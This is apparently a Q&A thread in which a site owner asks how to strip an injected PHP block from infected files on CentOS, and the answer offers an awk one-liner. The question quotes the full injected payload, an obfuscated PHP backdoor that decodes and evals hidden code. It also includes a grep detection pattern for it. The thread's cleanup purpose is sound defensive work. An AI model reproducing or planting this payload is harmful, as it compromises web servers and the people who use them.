# Updating shell script to remove first occurrence of php code block in infected files with awk

Tags: linux, awk, ssh

I'm trying to update a script i found that looks for hacked php scripts in a  directory then from what i understand removes the first line. While this works to remove the malicious code it also breaks every page.

The hack injects the following at the start of every file `<?php #Malicious code# ?>`. If the first line of the php file was <?php #anything# ?>. Unfortunately my Linux skills seem to be lacking, I tried to write this using sed similar to the answer in [this question](https://stackoverflow.com/questions/25996752/removing-a-string-in-a-php-file-with-start-and-end) but without any luck. I'm guessing i need to use awk and gsub but I've never had to use it before and can;t find any examples that involve matching anything like a code block.

**Current script**

```
if [[ -z "$1" ]]; then
  echo "Directory where to find is required."
else
  grep -rnwl $1 --include \*.php -e "\\\\x48\\\\124\\\\x54\\\\120\\\\x5f\\\\125\\\\x53\\\\105\\\\x52\\\\137\\\\x41\\\\107\\\\x45\\\\116\\\\x54" | while read -r filename ; do

if [[ ! -z "$2" ]]; then
   echo "Found file $filename. Cleaning..."
   awk 'BEGIN {matches=0} matches < 1 && /1/ { sub(/^.*<?php/,"<?php"); matches++ } { print $0 }' $filename > $filename.purged
   mv $filename $filename.bck
   mv $filename.purged $filename
else
  echo "Found file $filename."
fi

  done
  echo "Done."
fi
```

How would i update the script to remove the first PHP code block?

**This is an example of the first line I'm targeting**

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $infyfzdknt = '%x782f%x5c%x7825r%x5c%xx5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!25h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x782y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x782>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c61%156%x75%156%x61"])))) { $GLO*3>?*2b%x5c%x7825)gpf{jt3]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%7gj6<*doj%x5c%x78257-C)fepmqnjA%x5cx787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nb88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78]572]48y]#>m%x5c%x7825:|:*r%!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x)sf%x5c%x7878pmpusut!-#0fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldp82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%25!-#1]#-bubE{h%x5c%x7825)tpqsut>]86]y31]278]y3f]51L3]84]y5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gv]y76]277]y72]265]y39]274]y85]f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt27!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]5174]256#<!%x5c%x7825ff2!>!bssbz)%x5#<!%x5c%x7825t::!>!%x5c%x78x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y604%x5c%x78223}!+!<+{322]3]364]6]283]427]VUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x787822)!gj}1~!<2p%x5c%x7825%x5but%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%xc%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x78d]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x78!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%c%x7825!<*::::::-111112)eobs%x5c)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x78%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%xx7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%r#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7D!-id%x5c%x7825)uqpuft%x5c%x7860msvd}dy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz%x5c%x7825tmw!>!#]y84]275]y83]273]y76]2774}472%x5c%x7824<!%x5c%x7825mm!>g($n){return chr(ord($n)-1);} @error_repor]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]7825j:=tj{fpg)%x5c%x7825s:*<%x5ctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825y#2#%x5c%x782f#%x5c%x78287f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtf%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c7gj6<.[A%x5c%x7827&6<%x5c%x7c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825s!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)us%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x27;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovgx7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)%x7860bj+upcotn+qsvmt+fmhpph#)z%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%xc%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787vg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bu7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197y]552]e7y]#>n%x5c%x773]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#645#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x785!)!gj!<2,*j%x5c%x78Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x782-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssut7860hA%x5c%x7827pd%x5c%x78256y)#}#-#%x5c%x7824-%x5c%x7824-tusq%x7860un>qp%x5c%x7825!|Z~!<##!>!2p]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x782kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c)#]341]88M4P8]37]278]225]241]334]368]24]31#-%x5c%x7825tdz*Wsfu%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]25)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%xRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5codujpo!%x5c%x7824-%x5c%x7824y7%x5c1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fd7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c5%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#oe%x5c%x7825+*!*+fepdfe{hx69%164%50%x22%134%x78%62%x35%165!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]ys%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x78j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5cbss-%x5c%x7825r%x5c%x7878B%x5c%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsc%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)dXA%x5c%x7827K6<%x5c%x787fw85c%x5c%x7825j^%x5c%x7824-%x5c%x7824tv)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x77860QUUI&c_UOFHB%x5c%0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zWc%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5%x7825tjw!>!#]y84]275]y83]248]y83]25bE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%6]y81]265]y72]254]y76#<7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]2M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x#<%x5c%x7825t2w>#]y74]27f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x%155%x61%160%x28%42%x66%152%x66%141%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x22%51%x29%51%x29%73", NULL); }87fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;2f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878BsfujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&c%x7824]25%x5c%x7824-%x5c%x7824-x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825h%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x24<!%x5c%x7825tzw>!#%x7824-%x5c%x7824*<!%x5c%x7824t}X;%x5c%x7860msvd}R;*msv%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825f27tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOS245]K2]285]Ke]53Ld]53]Kc]55L7%x67%42%x2c%163%x74%162%x5f%163%x70%154%25nfd>%x5c%x7825fdy<Cb*[%x5c%x78.%x5c%x7825!<***f%x5c%x7827,*e%xd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{65c%x787f;!|!}{;)gj}l;33pmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5cpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x6]61]y33]68]y34]68]y33>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7827&6<*rfs%x5c%x782576~67<&w6<*&7-#o]s]o]s]#)fepmqyfpo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk31M6]y3e]81#%x5c%x782f#7c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|%x5c%x7825h>EzH,2W%x5c%sbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x785i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x785c%x7825c:>%x5c%x7825s:%x5c78256<C>^#zsfvr#%x5c%x785cq%x5c%x7x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8m3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf2#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825x5c%x7825V%x5c%x7827{ftmfV%x576]62]y3:]84#-!OVMM*<,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x439275ttfsqnpdov{h19275j{hnpd19275fub5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5-%x5c%x7824gps)%x5c%x7825j825<#372]58y]472]37y]672]48y]#>s%x5c%c%x787f!~!<##!>!2p%x5c%x7825Z<^2%f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2ting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<8256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hop25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%Oh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]8!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x7%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)fte:55946-tr.984:75983:48984:71]K9]77]D4]%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;5%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%xj%x5c%x7825!*72!%x5c%x78x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5fP4]D6#<%x5c%x7825G]y6d]281Ld]BALS["%x61%156%x75%156%x61"]=1; function fjfg&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x782787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x782%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782x7860SFTV%x5c%x7860QUUIx7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x78224Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#5)}.;%x5c%x7860UQPMSVj>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!if((function_exists("%x6f%142%x5f%163!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7825yy>#]D6]281Lbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#x78256<%x5c%x787fw6*%x5c%x787f_*#297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8>1<%x5c%x7825j=tj{fpg)%x5c%x78258257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y5)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x5)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudo25b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5>!%x5c%x78242178}527}88:}33+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvuf!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5%x5c%x7825!|!*!***b%x5c%x7825:7#6#)tutjyf%x5c%x7860c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c925<#g6R85,67R37,18R#>q%x5c%x7825V<*7825%x5c%x7824-%x5c%x7824y4%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x7%x74%141%x72%164") && (!isset($GLOBALS["%xy83]256]y81]265]y72]254]y7]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y/(.*)/epreg_replacemtuttucbhc'; $viszjgsdvq = explode(chr((300-256)),'9042,37,9990,42,249,31,8576,45,2300,42,7831,68,8488,59,5632,34,6280,41,4373,33,8998,44,4674,66,2561,52,2747,45,3517,29,9132,33,4865,65,6385,45,6674,31,8213,59,6453,57,1943,44,6654,20,5088,66,7942,50,3144,52,7899,43,4740,63,4978,27,7992,66,7221,51,1842,43,2095,50,7468,47,7121,34,9365,59,9589,52,3024,50,986,50,540,35,9930,60,2501,60,4450,66,6193,59,1396,53,9251,33,5818,45,2613,28,5741,39,9079,53,747,40,6131,34,8914,21,2145,37,7424,44,692,32,8659,51,9485,45,3074,70,5361,50,8801,44,3418,20,840,33,8464,24,1099,54,2981,43,1449,70,8058,48,2854,41,9715,43,9809,59,128,60,9424,61,1519,28,7655,33,4592,37,280,24,5043,45,435,35,3661,42,8348,64,6353,32,7552,40,5261,64,1810,32,3579,34,9758,29,724,23,4516,45,2895,31,9186,65,3476,41,3935,65,5910,52,5573,59,5154,21,8778,23,8621,38,4289,60,6705,67,1744,66,575,37,6939,37,7733,61,1653,52,2792,62,6857,59,9787,22,7515,37,6976,69,1355,21,4349,24,9668,47,2694,53,1547,59,7374,29,6796,61,2641,53,6602,52,9868,35,4629,45,3703,39,8311,37,1606,47,6430,23,1036,63,5175,42,2478,23,3350,68,6081,20,957,29,4111,66,5325,36,5411,23,2228,41,5549,24,304,70,188,61,3804,62,612,52,3866,69,3282,68,3196,20,7618,37,1302,53,664,28,23,62,9641,27,2269,31,4406,44,1241,34,5962,32,8149,64,5005,38,2427,51,3546,33,6510,70,9903,27,1987,50,898,59,4177,34,6101,30,7592,26,9333,32,8710,68,7688,45,1205,36,3613,48,1275,27,8845,69,3438,38,7045,49,5780,38,1885,58,5217,44,6916,23,2037,58,5994,43,8106,43,7319,55,4561,31,7155,66,9284,49,873,25,6772,24,8272,39,787,53,9165,21,4211,37,5863,47,7794,37,8547,29,6252,28,1705,39,6321,32,85,43,6165,28,2182,46,3742,37,1376,20,4063,48,2342,54,3779,25,4930,48,5666,43,0,23,4248,41,8412,52,2396,31,4803,62,9530,59,7094,27,6037,44,1153,52,8935,63,7272,47,470,70,4000,63,374,61,5492,57,5434,58,3216,66,2926,55,10032,26,6580,22,10058,48,7403,21,5709,32'); $hyuqivxhwn=substr($infyfzdknt,(36767-26661),(21-14)); if (!function_exists('bhulwkcpjv')) { function bhulwkcpjv($rhpkdvlbwg, $iqjbllfeox) { $abvwyxjirz = NULL; for($hvmnsalxhx=0;$hvmnsalxhx<(sizeof($rhpkdvlbwg)/2);$hvmnsalxhx++) { $abvwyxjirz .= substr($iqjbllfeox, $rhpkdvlbwg[($hvmnsalxhx*2)],$rhpkdvlbwg[($hvmnsalxhx*2)+1]); } return $abvwyxjirz; };} $jzntygfzmc="\x20\57\x2a\40\x7a\156\x63\153\x68\167\x77\152\x6b\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x34\60\x38\55\x33\61\x36\51\x29\54\x20\142\x68\165\x6c\167\x6b\143\x70\152\x76\50\x24\166\x69\163\x7a\152\x67\163\x64\166\x71\54\x24\151\x6e\146\x79\146\x7a\144\x6b\156\x74\51\x29\51\x3b\40\x2f\52\x20\166\x6e\147\x70\141\x73\164\x74\145\x64\40\x2a\57\x20"; $efyqpialpy=substr($infyfzdknt,(69117-59004),(55-43)); $efyqpialpy($hyuqivxhwn, $jzntygfzmc, NULL); $efyqpialpy=$jzntygfzmc; $efyqpialpy=(403-282); $infyfzdknt=$efyqpialpy-1; ?><?php
```

This is all running on centOS 6

Comment: You want to remove the first line of a file, but only if it matches a certain pattern?

Comment: Not quite, I want to remove the first block of PHP from the first opening tag to the first closng tag, from the first line of code in files that are picked up by the grep. This is because the hacker inserted their malicious code on the same line as the existing first line so if I just remove line 1 every file will have errors as the opening PHP tag will be missing

Answer (score 3, accepted):

awk to the rescue!

```
$ awk 'BEGIN{ORS=RS="?>"} NR>1' << EOF
> <?php #Malicious code# ?><?php #real program starts...# ?>
> ...etc
> EOF
<?php #real program starts...# ?>
...etc
```

you can run with a file input

```
$ awk 'BEGIN{ORS=RS="?>"} NR>1' input > output
```

defines the record structure based on the close tag, prints all except first tag.

Comment: Thanks, this did the trick after I noticed there are actually 2 code block and changed the NR>1 to NR>2.